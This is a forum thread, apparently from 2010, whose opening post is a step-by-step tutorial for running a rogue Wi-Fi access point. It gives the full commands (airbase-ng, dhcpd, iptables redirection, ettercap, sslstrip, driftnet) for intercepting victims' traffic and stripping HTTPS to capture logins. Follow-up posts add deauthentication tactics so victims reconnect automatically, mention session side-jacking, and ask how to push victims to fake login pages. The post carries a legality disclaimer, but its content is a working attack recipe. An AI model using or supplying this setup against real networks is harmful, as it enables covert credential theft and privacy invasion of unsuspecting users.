Page 1 of 4 123 ... LastLast
Results 1 to 10 of 72

Thread: Lucafa's tutorial: softAP with internet connection and MITM sniffing

Hybrid View

  1. #1
    Junior Member Lucifer's Avatar
    Join Date
    Feb 2010
    Posts
    75

    Post Lucafa's tutorial: softAP with internet connection and MITM sniffing

    last update: 11/03/'10

    I will update this tutorial as I find and learn about new interesting MITM tools to use.

    PURPOSE OF THIS TUTORIAL: Setting up a fake AP so clients can connect (or be forced to connect) and surf the internet like on a real AP, while we sniff their data/passwords and such, as we will be the Man In The Middle without the victim(s) knowing.


    NOTE: this is for testing purposes only, it's illegal to mess with clients/AP's that don't belong to you, and I will not help if I notice you're doing so.

    NEEDED:
    - A Backtrack 4 Final distro (LiveDVD/USB/Harddisk install is recommended, Vmware can cause problems)
    - A wireless injection-capable card (preferably with a well supported chipset like RTL8187, RT73, ..)
    - A second wired/wireless interface for an internet connection (a wired interface is recommended)
    - Semi-advanced Linux/Backtrack/Aircrack suite skills
    - Some common sense


    I will use mon0 (my monitor interface), and eth1 (internet), CHANGE those to your interfaces.
    also, you will need to find your internet standard gateway, and DNS name server(s).
    (my internet gateway and DNS name server are the same, 192.168.2.1)


    STEP 1: Establish an internet connection:
    Code:
    dhclient eth1
    STEP 2: Start your wireless interface in monitor mode:
    (make sure you'll use your monitor interface in step 4!)
    Code:
    airmon-ng start wlan0
    STEP 3: Configuring the dhcpd.conf:
    (on your root directory (deskpage), make a new text file, name it dhcpd.conf
    open it with kate, and paste this)

    Code:
    ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    authoritative;
    subnet 192.168.2.128 netmask 255.255.255.128 {
    option subnet-mask 255.255.255.128;
    option broadcast-address 192.168.2.255;
    option routers 192.168.2.129;
    option domain-name-servers 192.168.2.1;
    range 192.168.2.130 192.168.2.140;
    }
    CHANGE the domain-name-server(s) to yours! the rest stays the same. save the file.

    STEP 4: Setup fake AP:
    (look at this airbase-ng info page to learn how you could setup different types of fake AP's)
    Code:
    airbase-ng -e wifree mon0
    STEP 5: Assign an IP, netmask, gateway and set route for at0:
    (at0 is the TAP interface that's auto-created by airbase)
    Code:
    ifconfig at0 up
    ifconfig at0 192.168.2.129 netmask 255.255.255.128
    route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
    STEP 6: Configure and start dhcp3 server:
    (so clients who connect to your fake AP will get an IP adress and such)
    Code:
    mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
    echo > '/var/lib/dhcp3/dhcpd.leases'
    dhcpd3 -d -f -cf /root/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0
    STEP 7: Configure routing tables:
    (so an internet connection will be avaible on your softAP)
    Code:
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables --table nat --append POSTROUTING --out-interface eth1 -j MASQUERADE
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.2.1
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    CHANGE the standard gateway to your internet standard gateway!
    and also the interface to your interface with internet connection.


    STEP 8: Start MITM tools:
    (I will use ettercap, sslstrip, and driftnet, but you can do as you please.)

    => STEP 8.1: Change etter.conf file:
    (this is necessary for ettercap to function properly)
    Code:
    kate /etc/etter.conf
    (scroll down the file, search for "Linux", "if you use iptables", "#redir_command_off" and "#redir_command_on", just delete those two "#" signs, that all you need to do, save the file.)

    => STEP 8.2: Start ettercap:
    (to sniff passwords and such)
    Code:
    ettercap -T -q -p -i at0 // //
    => STEP 8.3: Start sslstrip:
    (to strip down secure https sites the victim visits, like hotmail.com, gmail, .. so the login details can be sniffed)
    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    sslstrip -a -k -f
    => STEP 8.4: Start driftnet:
    (this will show all the images the victim sees in his browser)
    Code:
    driftnet -v -i at0
    that's it! if you got all this down, well done.

    Now you should learn how airdrop-ng/mdk3 works to force clients(victims) to connect to your fake AP, so you can sniff their data.

    If you followed this tutorial correctly, your fake AP should be almost as fast like your real AP, at least, mine always is.
    I cannot tell the difference between surfing on the fake and on my real AP, but on the fake, everything gets sniffed

    note that I am still a semi-noob myself, it could be that some of the commands I provided aren't 100% correct, but this is just the way I do it.
    I had to figure it all out by myself, looking at other tutorials and piecing the puzzle together,
    and it's working amazingly well for me.
    If you're experiencing slow internet on your rogue AP, try it on a different pc! I also had to do this, when using the exact same commands and same alfa adapter on my laptop, it doesn't work. I don't know why, maybe hardware related.
    Changing interface MTU values like some people suggest didn't work for me.
    On my older pc, this way, this tutorial I made works perfect.
    Lastly, always remember you could go to jail when doing stuff like this to people you don't know, or don't have the authority to do so, DON'T DO IT.

    If someone knows other neat mitm tools I could add, please share.

    Comments are welcome!

    David
    Last edited by Lucifer; 03-31-2010 at 07:21 PM.

  2. #2
    Member
    Join Date
    Feb 2010
    Posts
    75

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    Nice tut,thanks for taking the time to put it together.
    Will give it a try soon

  3. #3
    Member
    Join Date
    Jan 2010
    Location
    Helsinki, Finland
    Posts
    235

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    Hi thanks that iptables part is great Iv got so many problems with iptables but now it seems to work.

    This is a great HowTo. Its recommended to use this with wired connection.

    I also used hamster for side-jacking
    Last edited by halfdone; 03-26-2010 at 09:52 PM.

  4. #4
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    3

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    Great tutorial, it worked on my first try--

    I have one concern though. Once the victim establishes a connection to the rogue AP all of the other hosts on the same network are visible to them. I'm trying to create more of a sand-boxed rogue AP environment. Maybe this could be done with more iptables rules. Any ideas? First I'm going to play with airdrop-ng.

    Thanks again!

  5. #5
    Junior Member Lucifer's Avatar
    Join Date
    Feb 2010
    Posts
    75

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    I'm glad I could help you guys.
    as for the sandboxed rogue ap, I had some thought about it, but it goes beyond my knowledge, sorry!
    I know about hamster aswell, but I'm not into side-jacking thanks for sharing though.

    One last comment, when using airdrop-ng to break connections between clients and their real AP's, keep this in mind: the essid AND the encryption needs to be the same as the victim uses on his real ap, otherwise a Windows victim for instance will not auto-reconnect to your fake ap. (we want the victim to auto-connect to our rogue ap when his connection to his real AP is broken, waiting for the victim to manually connect takes to long, get it)
    as soon as you start using airdrop against a client and the essid, encryption is set correctly in airbase, the victim will instantly connect, no escape from the rogue ap possible.
    for the victim, it'll be 'a little lag', but to us, it's succes!

    grtz
    Last edited by Lucifer; 03-24-2010 at 01:50 PM.

  6. #6
    Junior Member
    Join Date
    Mar 2010
    Posts
    29

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    Nice tutorial. I'm not sure if it works yet, If it does I think I'll put into a shell script to speed up the process. How would you change the fake login page that the victim is forced to into being directed to?

  7. #7
    Junior Member Lucifer's Avatar
    Join Date
    Feb 2010
    Posts
    75

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    What fake login page? there isn't one in my tutorial.. but if you're planning on redirecting victims to certain pages, I cannot help you since my knowledge is still very limited. I was only able to make this tutorial by looking at other tutorials on the net, but none of them was so well explained like mine I think, I made it so that anybody can do this without having to mess around for 3 days like I did.
    If you're gonna put it in a script, please share it.

    Thanks,

    .L

  8. #8
    Member
    Join Date
    Jan 2010
    Location
    Helsinki, Finland
    Posts
    235

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    Quote Originally Posted by marthafocker View Post
    Nice tutorial. I'm not sure if it works yet, If it does I think I'll put into a shell script to speed up the process. How would you change the fake login page that the victim is forced to into being directed to?
    Have anyone did that - how to create fake login page and force victims to it?

  9. #9
    Junior Member
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    79

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    Very nice tut! I also liked the way you spelled illegal that should be its proper spelling.

  10. #10
    Junior Member Lucifer's Avatar
    Join Date
    Feb 2010
    Posts
    75

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    Whoops, corrected it. I'm dutch.

Page 1 of 4 123 ... LastLast

Similar Threads

  1. Replies: 2
    Last Post: 08-23-2010, 10:53 AM
  2. rogue AP + MITM (tutorial or script request)
    By Lucifer in forum Beginners Forum
    Replies: 8
    Last Post: 04-12-2010, 12:40 AM
  3. internet connection problem?!
    By djamel in forum Beginners Forum
    Replies: 4
    Last Post: 02-27-2010, 06:08 AM
  4. Wireless Internet Connection Failing Somehow
    By shinjinkazama in forum Beginners Forum
    Replies: 1
    Last Post: 02-22-2010, 11:26 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •